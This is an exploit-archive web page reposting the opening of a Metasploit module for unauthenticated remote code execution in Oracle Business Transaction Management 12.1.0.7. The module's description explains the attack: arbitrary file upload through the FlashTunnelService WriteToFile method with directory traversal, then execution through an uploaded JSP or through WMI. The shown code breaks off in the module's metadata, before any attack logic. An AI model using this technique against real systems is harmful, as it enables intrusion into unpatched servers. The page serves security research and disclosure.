首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle BTM FlashTunnelService Remote Code Execution
来源:http://www.metasploit.com 作者:rgod 发布时间:2012-09-17  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE
	include Msf::Exploit::WbemExec

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle Business Transaction Management FlashTunnelService Remote Code Execution',
			'Description'    => %q{
					This module exploits abuses the FlashTunnelService SOAP web service on Oracle
				Business Transaction Management 12.1.0.7 to upload arbitrary files, without
				authentication, using the WriteToFile method. The same method contains a directory
				traversal vulnerability, which allows to upload the files to arbitrary locations.

				In order to execute remote code two techniques are provided. If the Oracle app has
				been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web
				root. If a new Domain has been used to deploy the Oracle application, the Windows
				Management Instrumentation service can be used to execute arbitrary code.

				Both techniques has been successfully tested on default installs of Oracle BTM
				12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are
				provided, but the user can configure the traversal depth using the DEPTH option.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'rgod <rgod[at]autistici.org>', # Vulnerability Discovery and PoC
					'sinn3r', # Metasploit module
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'OSVDB', '85087' ],
					[ 'BID', '54839' ],
					[ 'EDB', '20318' ]
				],
			'DefaultOptions'  =>
				{
					'WfsDelay' => 5
				},
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'           => 2048,
					'StackAdjustment' => -3500
				},
			'Platform'       => [ 'java', 'win' ],
			

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux udev Netlink Local Privi
·Novell Groupwise 8.0.2 HP3 and
·libdbus 'DBUS_SYSTEM_BUS_ADDRE
·NCMedia Sound Editor Pro v7.5.
·Internet Download Manager All
·Huawei Internet Mobile Overflo
·Internet Download Manager All
·NCMedia Sound Editor Pro 7.5.1
·Winamp MAKI Buffer Overflow
·Webmin /file/show.cgi Remote C
·Microsoft Internet Explorer ex
·WIS Coldfusion Exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved